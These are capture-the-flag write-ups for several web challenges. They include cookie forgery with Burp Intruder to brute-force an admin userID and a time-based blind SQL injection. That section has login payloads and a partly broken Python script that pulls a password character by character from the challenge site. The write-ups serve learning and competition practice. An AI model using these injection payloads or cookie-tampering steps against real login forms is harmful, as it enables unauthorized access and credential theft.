Solved by: Taz34

Simply login as admin using password admin Go to the simple quiz section and here we have the flag.



Solved by: Taz34

I logged in using the given credentials.

Found a cookie named userData with userID and username

here userID is 972 and username is kupatergent

Now i started looking into the given server code files and in one of the files named app.js i found this:

that indicates that we don’t need password for admin access we just need the correct user id.

So, now i fired up BurpSuite sent the request with cookie to the intruder replaced the username with admin and set the payload parameter at userID

Cookie: userData=j%3A%7B%22userID%22%3A%22§9§%22%2C%22username%22%3A%22admin%22%7D

Payload settings:

Also set up a grep match for flag{ as that is the starting of the flag

And now we have to look for a ticked checkbox for flag{ and in the response section of that response we have the flag

here we have the flag, we can confirm it on the website by changing the cookie values:

userID = 768
username = admin


NRC - no right click

Solved By : Starry-Lord

To bypass the right click problem:


big blind

Solved By : thewhiteh4t

user : ''
pass : '
user : ''
pass : ''
' or sleep(2) and 1=1#
' OR IF(SUBSTRING(pass,1,1)='f',sleep(5),sleep(0))#
from requests import post, ReadTimeout

url = 'https://big-blind.hsc.tf/'
charset = '_{}flagisodnbcehjkmpqrtuvwxyz'
flag = ''
counter = 0

while flag.endswith('}') != True:
    counter += 1
    for char in charset:
        payload = {
            'user': 'twh',
            'pass': f"' OR IF(SUBSTRING(pass,{counter},1)='{char}',sleep(5),sleep(0))#"
            r = post(url, data=payload, timeout=3)
        except ReadTimeout:
            flag += char
            print(f'FLAG : {flag}')

Digits of Pi 1

Solved By : Starry-Lord

First thing, check the cells and find a formula.

Formula seems to be pointing to another sheet’s called Source and its range ‘A:B’.

When you use spreadsheets, the accessibility tools actually help in un hiding hidden sheets, like the Source sheet here.

To activate accessibility tools, go to Tools (‘Outils’ on the picture), and select Accessibility tools.

Accessibility Tool include a way to call a range from the document so Monkey see🐒, Monkey do 🐒:

Note: it turns out you can reach a hidden sheet’s full range by just typing its name (‘Source’ instead of ‘Source’!A:B)

It reveals the hidden sheet! On the bottom left you can see it got added to the panes.

And as suspected, you can find the flag in there somewhere. Thanks to my team mates for finding the flag for me